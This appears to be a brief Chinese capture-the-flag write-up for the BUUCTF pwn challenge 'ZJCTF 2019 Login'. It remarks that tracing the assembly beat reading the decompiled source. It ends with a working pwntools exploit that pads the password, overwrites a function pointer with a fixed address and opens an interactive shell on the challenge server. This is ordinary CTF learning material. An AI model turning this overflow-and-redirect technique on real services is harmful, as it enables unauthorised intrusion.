[BUUCTF-pwn]——[ZJCTF 2019]Login
这道题学习还是很多的, 有的时候在源码中跟踪并不一定比在汇编代码中跟踪更快
这里最后一个函数的第一个参数会被当做函数执行,这里我就开始找那个地方可以将这个参数给改了。
v7也就是v3然后找来找去没发现。
不过汇编总是有奇效
这里有一篇博客超级详细, 我也就不在这里赘述了。
点击转跳
exploit
from pwn import *
p = remote('node3.buuoj.cn',25328)
payload = '2jctf_pa5sw0rd'.ljust(0x48, '\x00') + p64(0x400e88)
p.sendlineafter('username: ', 'admin')
p.sendafter('password: ', payload)
p.interactive()